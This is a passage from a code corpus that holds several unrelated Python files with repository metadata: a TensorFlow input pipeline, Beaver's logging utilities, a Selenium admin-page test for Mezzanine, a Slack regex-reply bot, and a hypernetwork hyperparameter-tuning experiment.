lambda file_name: self._dataset_fn(file_name).prefetch(1),
cycle_length=32,
sloppy=self._is_training,
)
)
if self._is_training:
dataset = dataset.shuffle(64)
# Parses the fetched records to input tensors for model function.
dataset = dataset.apply(
tf.data.experimental.map_and_batch(
self._parser_fn,
batch_size=batch_size,
num_parallel_batches=64,
drop_remainder=True,
)
)
dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
def _transform_fn(images, labels):
transformed_images = transform_image_for_tpu(
images, self._space_to_depth_block_size, self._transpose_input
)
return transformed_images, labels
if self._is_training:
dataset = dataset.map(_transform_fn, num_parallel_calls=64)
return dataset
class InputFnTest(object):
"""Input function for tf.Estimator."""
def __init__(self, file_pattern, params, mode, dataset_type="tfrecord"):
self._file_pattern = file_pattern
self._mode = mode
self._is_training = mode == ModeKeys.TRAIN
if dataset_type == "tfrecord":
self._dataset_fn = tf.data.TFRecordDataset
self._parser_fn = factory.parser_generator(params, mode)
else:
raise ValueError("Dataset type %s is not supported." % dataset_type)
self._transpose_input = params.train.transpose_input
self._space_to_depth_block_size = params.train.space_to_depth_block_size
def __call__(self, params):
batch_size = params["batch_size"]
dataset = tf.data.Dataset.list_files(self._file_pattern, shuffle=False)
if self._is_training:
dataset = dataset.repeat()
dataset = dataset.apply(self._dataset_fn)
# Parses the fetched records to input tensors for model function.
dataset = dataset.apply(
tf.data.experimental.map_and_batch(
self._parser_fn,
batch_size=batch_size,
num_parallel_batches=1,
drop_remainder=True,
)
)
def _transform_fn(images, labels):
transformed_images = transform_image_for_tpu(
images, self._space_to_depth_block_size, self._transpose_input
)
return transformed_images, labels
if self._is_training:
dataset = dataset.map(
_transform_fn, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return dataset
| 36.056604 | 81 | 0.651317 |
4a1f709edf528d3c85da18b3b4f20c4bdf130ea7 | 12,942 | py | Python | beaver/utils.py | Affirm/python-beaver | 5da2eba14c8420141f16f2728e67c0704b56f2a5 | [
"MIT"
] | null | null | null | beaver/utils.py | Affirm/python-beaver | 5da2eba14c8420141f16f2728e67c0704b56f2a5 | [
"MIT"
] | null | null | null | beaver/utils.py | Affirm/python-beaver | 5da2eba14c8420141f16f2728e67c0704b56f2a5 | [
"MIT"
] | 1 | 2018-05-11T19:47:44.000Z | 2018-05-11T19:47:44.000Z | # -*- coding: utf-8 -*-
import argparse
import glob2
import itertools
import logging
import logging.config
from logging.handlers import RotatingFileHandler
import platform
import re
import os
import os.path
import sys
import yaml
import json
import beaver
MAGIC_BRACKETS = re.compile('({([^}]+)})')
IS_GZIPPED_FILE = re.compile('.gz$')
REOPEN_FILES = 'linux' not in platform.platform().lower()
CAN_DAEMONIZE = sys.platform != 'win32'
cached_regices = {}
def parse_args(args=None):
epilog_example = """
    Beaver provides a lightweight method for shipping local log
    files to Logstash. It does this using redis, stdin, or
    zeromq as the transport. This means you'll need a redis,
    stdin, or zeromq input somewhere down the road to get the events.
Events are sent in logstash's json_event format. Options can
also be set as environment variables.
Please see the readme for complete examples.
"""
parser = argparse.ArgumentParser(description='Beaver logfile shipper',
epilog=epilog_example,
formatter_class=argparse.RawDescriptionHelpFormatter)
# Configures file location of beaver ini formatted config file.
parser.add_argument('-c', '--configfile',
help='ini config file path',
dest='config',
default='/dev/null')
# Configures file location of conf.d directory.
parser.add_argument('-C', '--confd-path',
help='path to conf.d directory',
dest='confd_path',
default='/etc/beaver/conf.d')
# Debug flag for debug logging.
parser.add_argument('-d', '--debug',
help='enable debug mode',
dest='debug',
default=False,
action='store_true')
# Daemonize the application AKA fork the process and run it in the background.
parser.add_argument('-D', '--daemonize',
help='daemonize in the background',
dest='daemonize',
default=False,
action='store_true')
# Files to watch
parser.add_argument('-f', '--files',
help='space-separated filelist to watch, can include globs (*.log). Overrides --path argument',
dest='files',
default=None,
nargs='+')
# Transport format
parser.add_argument('-F', '--format',
help='format to use when sending to transport',
default=None,
dest='format',
choices=['json', 'msgpack', 'raw', 'rawjson', 'string', 'gelf'])
    # hostname override for source host. If not provided, defaults to socket.gethostname()
parser.add_argument('-H', '--hostname',
help='manual hostname override for source_host',
default=None,
dest='hostname')
# Bind or connect mode.
parser.add_argument('-m', '--mode',
help='bind or connect mode',
dest='mode',
default=None,
choices=['bind', 'connect'])
    # Additional logfile to write output to.
parser.add_argument('-l', '--logfile',
'-o', '--output',
help='file to pipe output to (in addition to stdout)',
default=None,
dest='output')
# Path to log files.
parser.add_argument('-p', '--path',
help='path to log files',
default=None,
dest='path')
# Path to a pid file to store the currently running process when --daemonize is set.
parser.add_argument('-P', '--pid',
help='path to pid file',
default=None,
dest='pid')
# Which transport to use.
parser.add_argument('-t', '--transport',
help='log transport method',
dest='transport',
default=None,
choices=['kafka', 'mqtt', 'rabbitmq', 'redis', 'sns',
'sqs', 'kinesis', 'stdout', 'tcp', 'udp',
'zmq', 'http', 'file'])
# Print the version of beaver.
parser.add_argument('-v', '--version',
help='output version and quit',
dest='version',
default=False,
action='store_true')
# Use the machine's FQDN for source_host
parser.add_argument('--fqdn',
help='use the machine\'s FQDN for source_host',
dest='fqdn',
default=False,
action='store_true')
# Maximum bytes per log file when --logfile is provided for output logging. (Defaults to 64MB)
parser.add_argument('--max-bytes',
action='store',
dest='max_bytes',
type=int,
default=64 * 1024 * 1024,
                        help='Maximum bytes per logfile.')
# Number of backup files to keep around when --logfile is provided for output logging.
parser.add_argument('--backup-count',
action='store',
dest='backup_count',
type=int,
default=1,
help='Maximum number of logfiles to backup.')
# A YAML, JSON, or configparser (.ini) formatted logging config to use.
# See https://docs.python.org/2/library/logging.config.html.
# A file ending with .yaml and .yml is parsed as yaml.
# A file ending with .json is parsed as json.
# A file ending in .cfg or anything else is parsed as a configparser format (.ini format)
parser.add_argument('--logging-config',
help='Path to a python logging config.',
default=None,
dest='logging_config')
args = parser.parse_args(args)
if args.config != "/dev/null":
args.config = os.path.realpath(args.config)
return args
def setup_custom_logger(name, args=None, output=None, formatter=None, debug=None, config=None, max_bytes=None, backup_count=None):
if args and args.logging_config:
logging_config = args.logging_config
if not os.path.exists(logging_config):
raise OSError("No such file {}".format(logging_config))
if not os.path.isfile(logging_config):
raise ValueError("Path {} must be a file not a directory.".format(logging_config))
if logging_config.endswith('.yml') or logging_config.endswith('.yaml'):
if sys.version_info[:2] <= (2, 6):
raise ValueError('yaml logging config is only supported with python versions >= 2.7.')
# Parse as YAML
with open(logging_config, 'r') as f:
                dictionary = yaml.safe_load(f.read())
logging.config.dictConfig(dictionary)
elif logging_config.endswith('.json'):
if sys.version_info[:2] <= (2, 6):
raise ValueError('json logging config is only supported with python versions >= 2.7.')
# Parse as JSON
with open(logging_config, 'r') as f:
dictionary = json.loads(f.read())
logging.config.dictConfig(dictionary)
else:
logging.config.fileConfig(logging_config)
return logging.getLogger(name)
# Anything past here means we don't have a logging config, so set up default logging.
logging.basicConfig()
logger = logging.getLogger(name)
logger.propagate = False
if logger.handlers:
logger.handlers = []
has_args = args is not None and type(args) == argparse.Namespace
if debug is None:
debug = has_args and args.debug is True
if not logger.handlers:
if formatter is None:
formatter = logging.Formatter('[%(asctime)s] %(levelname)-7s %(message)s')
if output is None and has_args:
if config and config.get('output'):
output = config.get('output')
else:
output = args.output
if output:
output = os.path.realpath(output)
if output is not None:
if has_args and backup_count is None:
backup_count = args.backup_count
if has_args and max_bytes is None:
max_bytes = args.max_bytes
if backup_count is not None and max_bytes is not None:
assert backup_count > 0
assert max_bytes > 0
ch = RotatingFileHandler(output, 'a', max_bytes, backup_count)
if formatter is not False:
ch.setFormatter(formatter)
logger.addHandler(ch)
else:
file_handler = logging.FileHandler(output)
if formatter is not False:
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
else:
handler = logging.StreamHandler()
if formatter is not False:
handler.setFormatter(formatter)
logger.addHandler(handler)
if debug:
logger.setLevel(logging.DEBUG)
if hasattr(logging, 'captureWarnings'):
logging.captureWarnings(True)
else:
logger.setLevel(logging.INFO)
if hasattr(logging, 'captureWarnings'):
logging.captureWarnings(False)
logger.debug('Logger level is {0}'.format(logging.getLevelName(logger.level)))
return logger
def version(args):
if args.version:
formatter = logging.Formatter('%(message)s')
logger = setup_custom_logger('beaver', args=args, formatter=formatter)
logger.info('Beaver {0}'.format(beaver.__version__))
sys.exit(0)
def eglob(path, exclude=None):
"""Like glob.glob, but supports "/path/**/{a,b,c}.txt" lookup"""
fi = itertools.chain.from_iterable
paths = list(fi(glob2.iglob(d) for d in expand_paths(path)))
if exclude:
cached_regex = cached_regices.get(exclude, None)
if not cached_regex:
cached_regex = cached_regices[exclude] = re.compile(exclude)
paths = [x for x in paths if not cached_regex.search(x)]
return paths
def expand_paths(path):
"""When given a path with brackets, expands it to return all permutations
of the path with expanded brackets, similar to ant.
>>> expand_paths('../{a,b}/{c,d}')
['../a/c', '../a/d', '../b/c', '../b/d']
>>> expand_paths('../{a,b}/{a,b}.py')
['../a/a.py', '../a/b.py', '../b/a.py', '../b/b.py']
>>> expand_paths('../{a,b,c}/{a,b,c}')
['../a/a', '../a/b', '../a/c', '../b/a', '../b/b', '../b/c', '../c/a', '../c/b', '../c/c']
>>> expand_paths('test')
['test']
>>> expand_paths('')
"""
pr = itertools.product
parts = MAGIC_BRACKETS.findall(path)
if not path:
return
if not parts:
return [path]
permutations = [[(p[0], i, 1) for i in p[1].split(',')] for p in parts]
return [_replace_all(path, i) for i in pr(*permutations)]
def _replace_all(path, replacements):
for j in replacements:
path = path.replace(*j)
return path
def multiline_merge(lines, current_event, re_after, re_before):
""" Merge multi-line events based.
Some event (like Python trackback or Java stracktrace) spawn
on multiple line. This method will merge them using two
regular expression: regex_after and regex_before.
If a line match re_after, it will be merged with next line.
If a line match re_before, it will be merged with previous line.
This function return a list of complet event. Note that because
we don't know if an event is complet before another new event
start, the last event will not be returned but stored in
current_event. You should pass the same current_event to
successive call to multiline_merge. current_event is a list
of lines whose belong to the same event.
"""
events = []
for line in lines:
if re_before and re_before.match(line):
current_event.append(line)
elif re_after and current_event and re_after.match(current_event[-1]):
current_event.append(line)
else:
if current_event:
events.append('\n'.join(current_event))
current_event.clear()
current_event.append(line)
return events
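

# --- Editorial usage sketch (not part of the original Beaver API) ---
# A minimal, hypothetical illustration of multiline_merge joining a Python
# traceback into a single event; the regex below is an example, not a Beaver
# default.
if __name__ == '__main__':
    _re_after = re.compile(r'^(Traceback|\s+)')
    _pending = []
    _done = multiline_merge(
        ["Traceback (most recent call last):",
         "  File \"app.py\", line 1, in <module>",
         "ValueError: boom",
         "a new, unrelated log line"],
        _pending, _re_after, None)
    # _done holds the merged traceback as one string; _pending still holds the
    # last line, waiting for the next call to decide whether it is complete.
    print(_done)
    print(_pending)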
| 37.29683 | 130 | 0.559496 |
4a1f71afb360ebc6b8d8c71bfc6a1d37cf74d4b9 | 3,431 | py | Python | test/page_form.py | Dibyadarshan/mezzanine | 6bc046f086c70c1f6bda3458eafbbe2da54df0c8 | [
"BSD-2-Clause"
] | null | null | null | test/page_form.py | Dibyadarshan/mezzanine | 6bc046f086c70c1f6bda3458eafbbe2da54df0c8 | [
"BSD-2-Clause"
] | null | null | null | test/page_form.py | Dibyadarshan/mezzanine | 6bc046f086c70c1f6bda3458eafbbe2da54df0c8 | [
"BSD-2-Clause"
] | null | null | null | from selenium import webdriver
import time
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
driver = webdriver.Firefox(executable_path="/home/anmol/PycharmProjects/prg1/geckodriver-v0.24.0-linux64/geckodriver")
wait = WebDriverWait(driver, 10)
driver.implicitly_wait(10)
driver.get("http://127.0.0.1:8000/admin/login/?next=/admin/")
driver.maximize_window()
username = "demo"
password = "demo"
username_element = wait.until(EC.element_to_be_clickable((By.XPATH,"//*[@id='id_username']")))
username_element.send_keys(username)
password_element = wait.until(EC.element_to_be_clickable((By.XPATH,"//*[@id='id_password']")))
password_element.send_keys(password)
login = wait.until(EC.element_to_be_clickable((By.XPATH,'/html/body/div/div[2]/form/div[2]/input')))
login.click()
assert driver.current_url=="http://127.0.0.1:8000/admin/"
pages = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div/div[3]/div[1]/ul/li[1]/ul/li[1]/a')))
pages.click()
select_element = wait.until(
EC.element_to_be_clickable((By.XPATH, '/ html / body / div / div[4] / div / div[1] / select')))
select_element = Select(select_element)
select_element.select_by_index(2)
title = "form page"
content = "page form"
page_title = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="id_title"]')))
page_title.send_keys(title)
iframe = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="id_content_ifr"]')))
driver.switch_to.frame(iframe)
page_content = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/p')))
script = "arguments[0].insertAdjacentHTML('afterEnd', arguments[1])"
driver.execute_script(script, page_content, content)
driver.switch_to.default_content()
field = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="id_fields-0-label"]')))
field.send_keys("Field")
ff = wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'submit-row')))
driver.execute_script("arguments[0].style.visibility='hidden'", ff)
fieldValue = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="id_fields-0-field_type"]')))
fieldValue = Select(fieldValue)
fieldValue.select_by_visible_text("Single line text")
driver.execute_script("arguments[0].style.visibility='visible'", ff)
page_save = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[1]/div[4]/div/form/div/div[3]/input[1]')))
page_save.click()
bodyText = wait.until(EC.element_to_be_clickable((By.TAG_NAME, 'body')))
assert "successfully" in bodyText.text
open_page = wait.until(EC.element_to_be_clickable((By.LINK_TEXT, title)))
open_page.click()
view_site = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[1]/div[4]/div/ul/li[3]/a')))
view_site.click()
# print(driver.window_handles)
time.sleep(5)
window_before = driver.window_handles[0]
window_after = driver.window_handles[1]
driver.switch_to.window(window_after)
# fieldValue = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR,'#id_field_9')))
# fieldValue.send_keys("some value")
# time.sleep(5)
driver.switch_to.window(window_before)
log_out = wait.until(EC.element_to_be_clickable((By.LINK_TEXT,"Log out")))
log_out.click()
bodyText = wait.until(EC.element_to_be_clickable((By.TAG_NAME, 'body')))
assert "Logged out" in bodyText.text
driver.quit() | 49.014286 | 119 | 0.767706 |
4a1f73fb1501c63fea7314a403172eda52abaf46 | 6,694 | py | Python | regexbot.py | davidxiao93/regexbot | e9821f9c7e719214ac811fbef1d0b7b28dab7ab1 | [
"MIT"
] | null | null | null | regexbot.py | davidxiao93/regexbot | e9821f9c7e719214ac811fbef1d0b7b28dab7ab1 | [
"MIT"
] | null | null | null | regexbot.py | davidxiao93/regexbot | e9821f9c7e719214ac811fbef1d0b7b28dab7ab1 | [
"MIT"
] | null | null | null |
import time
import re
from slackclient import SlackClient
from sheetclient import SheetClient
import pprint
pp = pprint.PrettyPrinter(indent=4)
import random
RTM_READ_DELAY = 0.1 # 0.1 second delay between reading from RTM
MAX_LENGTH = 2048
SNIPPET_CHAR_THRESHOLD = 512
SNIPPET_LINE_THRESHOLD = 8
RETRY_SENDS = 10
class RegexBot:
def __init__(self, sheet_id, slack_bot_token):
self.sheet_client = SheetClient(sheet_id)
self.slack_client = SlackClient(slack_bot_token)
        self.starterbot_id = None
self.compiled_regex_list = []
def start(self):
print("Initialising regexes")
self.load_regexes()
if self.slack_client.rtm_connect(with_team_state=False):
print("Starter Bot connected and running!")
# Read bot's user ID by calling Web API method `auth.test`
self.starterbot_id = self.slack_client.api_call("auth.test")["user_id"]
while True:
self.handle_next_events(self.slack_client.rtm_read())
time.sleep(RTM_READ_DELAY)
else:
print("Connection failed. Exception traceback printed above.")
def load_regexes(self):
self.compiled_regex_list = []
self.sheet_client.clear_status()
raw_regex_list = self.sheet_client.get_regexes()
regex_dict = {}
compiled_regex_count = 0
self.sheet_client.update_status(["Checking"] * len(raw_regex_list))
message_list = []
for i, row in enumerate(raw_regex_list):
message = "Accepted"
if len(row) >= 2 and len(row[0].strip()) == 0 and len(row[1].strip()) == 0:
message = ""
elif len(row) < 2 or len(row[0].strip()) == 0 or len(row[1].strip()) == 0:
message = "Empty Cell"
elif len(row[0].strip()) > MAX_LENGTH or len(row[1].strip()) > MAX_LENGTH:
message = "Regex too long: " + str(len(row[0].strip())) + ", " + str(len(row[1].strip())) + ", maximum is " + str(MAX_LENGTH)
else:
source_regex = row[0].strip()
destination_regex = row[1].strip()
try:
compiled_regex = re.compile(source_regex)
if compiled_regex not in regex_dict:
regex_dict[compiled_regex] = []
compiled_regex_count += 1
regex_dict[compiled_regex].append(destination_regex)
except re.error as e:
message = "Error compiling regex"
message_list.append(message)
self.sheet_client.update_status(message_list)
for compiled_regex, destination_regexes in regex_dict.items():
self.compiled_regex_list.append((compiled_regex, destination_regexes))
def handle_response(self, response):
if response["ok"] is False and response["headers"]["Retry-After"]:
# The `Retry-After` header will tell you how long to wait before retrying
delay = int(response["headers"]["Retry-After"])
print("Rate limited. Retrying in " + str(delay) + " seconds")
time.sleep(delay)
return False
return True
def send_message(self, channel, message, is_plain, original_event):
thread_ts = None
if "thread_ts" in original_event:
thread_ts = original_event["thread_ts"]
if thread_ts is None:
if is_plain:
return self.slack_client.api_call(
"chat.postMessage",
channel=channel,
text=message
)
else:
return self.slack_client.api_call(
"files.upload",
channels=channel,
content=message
)
else:
if not is_plain:
message = "Cannot send Snippets in a Thread. This is a Slack limitation"
return self.slack_client.api_call(
"chat.postEphemeral",
channel=channel,
text=message,
user=original_event["user"]
)
else:
reply_broadcast = None
if "reply_broadcast" in original_event:
reply_broadcast = original_event["reply_broadcast"]
if reply_broadcast is None:
return self.slack_client.api_call(
"chat.postMessage",
channel=channel,
text=message,
thread_ts=thread_ts
)
else:
return self.slack_client.api_call(
"chat.postMessage",
channel=channel,
text=message,
thread_ts=thread_ts,
reply_broadcast=reply_broadcast
)
def retryable_send_message(self, channel, message, is_plain, original_event):
got_successful_response = False
attempts = 0
while not got_successful_response:
            got_successful_response = self.handle_response(self.send_message(channel, message, is_plain, original_event))
            attempts += 1
            if attempts > RETRY_SENDS:
                print("Failed to send message after", RETRY_SENDS, "attempts!")
                break
def handle_message(self, slack_event):
message_text = slack_event["text"]
message_channel = slack_event["channel"]
if message_text == "<@" + str(self.starterbot_id) + "> reload":
# If the exact message "@regexbot reload" is seen, then reload the regexes
self.load_regexes()
return
for source_regex, destination_regexes in self.compiled_regex_list:
try:
maybe_match = source_regex.search(message_text)
if maybe_match:
new_message = re.sub(source_regex, random.choice(destination_regexes), maybe_match.group(0))
is_plain_message = len(new_message) < SNIPPET_CHAR_THRESHOLD and len(new_message.split('\n')) < SNIPPET_LINE_THRESHOLD
self.retryable_send_message(message_channel, new_message, is_plain_message, slack_event)
return
except re.error as e:
print("Regex Error!", e)
continue
def handle_next_events(self, slack_events):
for event in slack_events:
if event["type"] == "message" and not "subtype" in event and "text" in event:
self.handle_message(event)
| 41.320988 | 141 | 0.569764 |
4a1f75b8394cc3784997c0c9de5174039d2953b3 | 17,728 | py | Python | code/learn_vs_true_loss_scatter.py | cpoptic/hypernet-hypertraining | 3a4fd37e021921d5426723d0782a9cb746f6e700 | [
"MIT"
] | 19 | 2018-03-23T22:33:56.000Z | 2021-05-12T05:15:44.000Z | code/learn_vs_true_loss_scatter.py | cpoptic/hypernet-hypertraining | 3a4fd37e021921d5426723d0782a9cb746f6e700 | [
"MIT"
] | 2 | 2021-01-26T23:51:08.000Z | 2021-01-27T02:31:44.000Z | code/learn_vs_true_loss_scatter.py | cpoptic/hypernet-hypertraining | 3a4fd37e021921d5426723d0782a9cb746f6e700 | [
"MIT"
] | 7 | 2018-08-19T13:54:57.000Z | 2021-05-04T07:52:08.000Z | # !/usr/bin/python
# -*- coding: utf-8 -*-
"""Run the main body of this code to execute experiments."""
from __future__ import absolute_import
from __future__ import print_function
import os
import os.path
import autograd.numpy as np
import autograd.numpy.random as npr
import pickle
from autograd import grad
from autograd.misc.flatten import flatten
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF
from code.plotting import create_figure_and_axs, setup_ax_and_save, full_extent
from code.optimizers import adam, opt_params
from code.data_loader import load_mnist
from code.neural_network import init_random_params, identity, nn_predict, pred_loss
def log_gaussian(weights, var):
"""Find the log probability of the weights given some centered, spherical Gaussian prior.
:param weights: The parameters ([[float]]) of the neural network.
:param var: The variance (positive float) of the Gaussian distribution.
:return: The log probability (float) of the weights of the neural network.
"""
norm_sum = 0.0
for i in range(10):
norm_sum += np.linalg.norm(weights[0][0][:, i] * np.exp(var[i]), 2)
return -norm_sum / 10.0
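
# --- Editorial worked example (shapes are an assumption based on the MNIST setup below) ---
# With a single-layer parameter structure weights = [(W, b)] where W has shape
# (784, 10), the return value is -(1/10) * sum_i ||W[:, i] * exp(var[i])||_2:
# a per-output-column L2 penalty whose strength is set by the log-scale
# hyperparameters var. For instance, if every entry of W were 1.0 and var were
# all zeros, each column norm would be sqrt(784) = 28, so the result is -28.0.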
def experiment(train_data, valid_data, init_scale, num_iters_hypernet, step_size_hypernet, step_size, num_iters,
batch_size_data, global_seed=0):
"""Run the second experiment, which consists of fitting a hypernetwork, which outputs neural network parameters.
These neural network parameters try to fit the training data with some additional loss for the hyperparameters.
We try to optimize the hyperparameters given the learned neural network response through the hypernetwork.
We observe how the hypernetwork performs on the training and testing, by graphing it against the true loss.
The true loss is found by training a neural network to convergence at a discrete number of points.
:param train_data: The training data.
:param valid_data: The testing data.
:param init_scale: The scale (positive float) for the hypernetwork initialization.
:param num_iters_hypernet: The number of iterations (integer) to run the hypernetwork optimizer for.
:param step_size_hypernet: The step size (positive float) for the hypernetwork optimizer.
:param step_size: The step size (positive float) for the loss approximation optimizer.
:param num_iters: The number of iterations (integer) to run the optimization for.
:param batch_size_data: The number of data points (integer) for a batch.
:param global_seed: The seed (integer) to use when choosing a constant seed.
:return: None, but saves pictures.
"""
assert init_scale > 0
    assert step_size_hypernet > 0 and step_size > 0
    assert num_iters > 0 and num_iters_hypernet > 0
def hyper_loss(weights, hyper):
"""Find the loss for neural network that is dependant on the hyperparameter.
:param weights: The weights ([[float]]) of the neural network.
:param hyper: The hyperparameter (float) input to the hypernetwork.
        :return: The loss (float) of the network, dependent on the hyperparameter.
"""
return -log_gaussian(weights, hyper)
train_inputs, train_targets = train_data
valid_inputs, valid_target = valid_data
batch_ind, feature_ind = 0, 1
elementary_input_size = np.shape(train_inputs)[feature_ind]
elementary_output_size = np.shape(train_targets)[feature_ind]
elementary_layer_sizes = [elementary_input_size, elementary_output_size]
num_hypers = 10 # The dimensionality of the hyperparameter space (integer).
batch_size_elementary = 100 # The number of elementary data points to sample (i.e not hyperparameters).
# Define neural network and function to turn a vector into its weight structure.
example_elementary_params = init_random_params(init_scale, elementary_layer_sizes, npr.RandomState(global_seed))
flat_elementary_params, unflatten_vector_to_network_weights = flatten(example_elementary_params)
num_elementary_params = len(flat_elementary_params)
rs_train = npr.RandomState(global_seed)
def train_objective(weights, hyper, seed):
"""The objective for training a neural network.
:param weights: The weights ([[float]]) of the neural network.
:param hyper: The hyperparameter (float) input to the hypernetwork.
:param seed: The seed (integer) for sampling.
:return: The training loss (float).
"""
idx = rs_train.randint(len(train_inputs) - batch_size_elementary)
return -pred_loss(weights, train_inputs[idx:idx+batch_size_elementary],
train_targets[idx:idx+batch_size_elementary]) + hyper_loss(weights, hyper)
def valid_objective(weights, hyper, seed):
"""The objective for validating a neural network.
:param weights: The weights ([[float]]) of the neural network.
:param hyper: The hyperparameter (float) input to the hypernetwork.
:param seed: The seed (integer) for sampling a hyperparameter.
:return: The validation loss (float).
"""
return -pred_loss(weights, valid_inputs, valid_target)
# TODO: Rename valid_objective to prediction loss, and move train objective into data generator block
pickle_name = 'learn_vs_true_loss_scatter.pickle'
if not os.path.isfile(pickle_name): # Train a neural network from scratch with different hyperparameter values.
real_step_size = 0.0001 # The step size to use to find the real loss (float).
real_num_iters = 1000 # The number of iterations to use to find the real loss (integer).
num_data = 2 ** 10 * 10
data_inputs, data_target_params, data_target_loss = [], [], []
for i in range(num_data):
hyper_train = rs_train.rand(num_hypers) * 6.0 - 3.0
print("Optimizing network parameters: ", i)
init_params = init_random_params(init_scale, elementary_layer_sizes, npr.RandomState(global_seed))
def cur_obj(w, seed):
"""The current objective function of the neural network.
:param w: The weights ([float]) of the neural network.
:param seed: The seed (integer) for sampling a hyperparameter.
:return: The current objective value (float).
"""
return train_objective(w, hyper_train, seed)
optimized_params, _, _, _ = adam(grad(cur_obj), init_params, step_size=real_step_size, num_iters=real_num_iters)
loss = valid_objective(optimized_params, hyper_train, global_seed)
data_inputs += [hyper_train]
flatten_opt_param, unflatten_vector_to_network_weights = flatten(optimized_params)
data_target_params += [flatten_opt_param]
data_target_loss += [loss]
data_inputs = np.array(data_inputs)
data_target_params = np.array(data_target_params)
data_target_loss = np.array(data_target_loss)
with open(pickle_name, 'wb') as handle:
pickle.dump({'inputs': data_inputs, 'target_params': data_target_params, 'target_loss': data_target_loss},
handle, protocol=pickle.HIGHEST_PROTOCOL)
with open(pickle_name, 'rb') as handle:
pickle_data = pickle.load(handle)
data_inputs = pickle_data['inputs']
data_target_params = pickle_data['target_params']
data_target_loss = pickle_data['target_loss']
batch_size_sample = batch_size_data
train_ind, valid_ind = batch_size_data, batch_size_data
data_inputs_train, data_inputs_valid = data_inputs[:train_ind], data_inputs[valid_ind:]
data_target_params_train, _ = data_target_params[:train_ind], data_target_params[valid_ind:]
data_target_loss_train, data_target_loss_valid = data_target_loss[:train_ind], data_target_loss[valid_ind:]
# New training for lambda, W, and lambda, Loss
weight_layer_sizes = [num_hypers, num_elementary_params]
init_weight_params = init_random_params(init_scale, weight_layer_sizes, npr.RandomState(global_seed))
def train_weight_objective_loss(weights, seed):
"""The objective for training a neural network.
:param weights: The weights ([[float]]) of the neural network.
:param seed: The seed (integer) for sampling.
:return: The training loss (float).
"""
local_data_inputs = [rs_train.rand(num_hypers) * 6.0 - 3.0 for _ in range(batch_size_sample)]
losses = [train_objective(unflatten_vector_to_network_weights(nn_predict(weights, np.array([local_data_input]),
identity)[0]),
local_data_input, global_seed)
for local_data_input in local_data_inputs]
return np.mean(np.array(losses))
def callback_weights_loss(weights, opt_iteration, g):
"""A callback for optimization.
:param weights: The hypernetwork weights
:param opt_iteration: The optimization iteration
:param g: The gradient.
:return: None
"""
if opt_iteration % 10 == 0:
print("Sampled Valid Loss Target: ", opt_iteration, ", Loss: ", train_weight_objective_loss(weights, 0))
weight_params_loss, _, _, _ = adam(grad(train_weight_objective_loss), init_weight_params,
step_size=step_size_hypernet, num_iters=num_iters_hypernet + 100,
callback=callback_weights_loss)
init_weight_params = init_random_params(init_scale, weight_layer_sizes, npr.RandomState(global_seed))
def train_weight_objective_loss_target(weights, seed):
"""The objective for training a neural network.
:param weights: The weights ([[float]]) of the neural network.
:param seed: The seed (integer) for sampling.
:return: The training loss (float).
"""
idx = rs_train.randint(np.maximum(len(data_inputs_train) - batch_size_data, 1))
local_data_inputs = data_inputs_train[idx:idx + batch_size_data]
losses = [train_objective(unflatten_vector_to_network_weights(nn_predict(weights, np.array([local_data_input]),
identity)[0]),
local_data_input, global_seed)
for local_data_input in local_data_inputs]
return np.mean(np.array(losses))
def callback_weights_loss_target(weights, opt_iteration, g):
"""A callback for optimization.
:param weights: The hypernetwork weights
:param opt_iteration: The optimization iteration
:param g: The gradient.
:return: None
"""
if opt_iteration % 10 == 0:
print("Fixed Valid Loss Target: ", opt_iteration, ", Loss: ",
train_weight_objective_loss_target(weights, 0))
weight_params_loss_target, _, _, _ = adam(grad(train_weight_objective_loss_target), init_weight_params,
step_size=step_size_hypernet, num_iters=num_iters_hypernet,
callback=callback_weights_loss_target)
print("Preparing the data for plotting...")
kernel = RBF()
gp = GaussianProcessRegressor(kernel=kernel, n_restarts_optimizer=1)
gp.fit(data_inputs_train, data_target_loss_train)
gp_loss_predictions, sigma = gp.predict(data_inputs_valid, return_std=True)
def hypernet_loss(weights, local_data_input):
"""Find the loss for the hypernetwork.
:param weights: The hypernet weights
:param local_data_input: A hyperparameter.
:return: None
"""
weight_predictions_valid = nn_predict(weights, [local_data_input], identity)
weight_predictions_valid = unflatten_vector_to_network_weights(weight_predictions_valid[0])
return valid_objective(weight_predictions_valid, None, global_seed)
loss_weight_predictions_loss = [hypernet_loss(weight_params_loss, data_input)
for data_input in data_inputs_valid]
loss_weight_predictions_loss_target = [hypernet_loss(weight_params_loss_target, data_input)
for data_input in data_inputs_valid]
fig, axs = create_figure_and_axs(fig_width=21, fig_height=7, num_cols=3, ms_size=34)
print("Drawing the scatter plot...")
min_v, max_v = 0.6, 1.1
axs[0].hexbin(data_target_loss_valid, gp_loss_predictions, extent=[min_v, max_v, min_v, max_v], cmap='Reds',
mincnt=1)
axs[1].hexbin(data_target_loss_valid, loss_weight_predictions_loss_target, extent=[min_v, max_v, min_v, max_v],
cmap='Greens', mincnt=1)
axs[2].hexbin(data_target_loss_valid, loss_weight_predictions_loss, extent=[min_v, max_v, min_v, max_v],
cmap='Blues', mincnt=1)
print("____________________________________________________________________________")
print("Number of train data points: ", batch_size_data)
print("GP Predicted Best: ", np.min(gp_loss_predictions), ", Actual Result: ",
data_target_loss_valid[np.argmin(gp_loss_predictions)])
print("Fixed Hypernet Predicted Best: ", np.min(loss_weight_predictions_loss_target),
", Actual Result: ", data_target_loss_valid[np.argmin(loss_weight_predictions_loss_target)])
print("Stochastic Hypernet Predicted Best: ", np.min(loss_weight_predictions_loss),
", Actual Result: ", data_target_loss_valid[np.argmin(loss_weight_predictions_loss)])
